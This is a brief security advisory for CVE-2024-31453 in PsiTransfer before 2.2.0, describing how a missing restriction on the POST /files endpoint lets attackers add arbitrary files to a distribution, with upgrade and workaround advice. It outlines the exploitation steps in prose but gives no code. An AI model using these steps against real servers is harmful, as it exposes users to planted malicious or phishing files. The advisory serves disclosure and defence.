CVE-2024-31453

Name of the Vulnerable Software and Affected Versions PsiTransfer versions prior to 2.2.0

Description The issue arises from the absence of restrictions on the "POST /files" endpoint, which allows users to create a path for uploading a file in a file distribution. This enables an attacker to add arbitrary files to the distribution, potentially influencing users who access the distribution afterwards and exposing them to malicious or phishing files. The exploitation involves creating a file distribution, obtaining the distribution's id, and then sending a POST request to the vulnerable endpoint with the id specified in the Upload-Metadata header. The attacker can then send a PATCH request to upload arbitrary content.

Recommendations For PsiTransfer versions prior to 2.2.0, update to version 2.2.0 or later to resolve the issue. As a temporary workaround, consider restricting access to the "POST /files" endpoint to minimize the risk of exploitation. Avoid using the sid parameter in the Upload-Metadata header until the issue is resolved.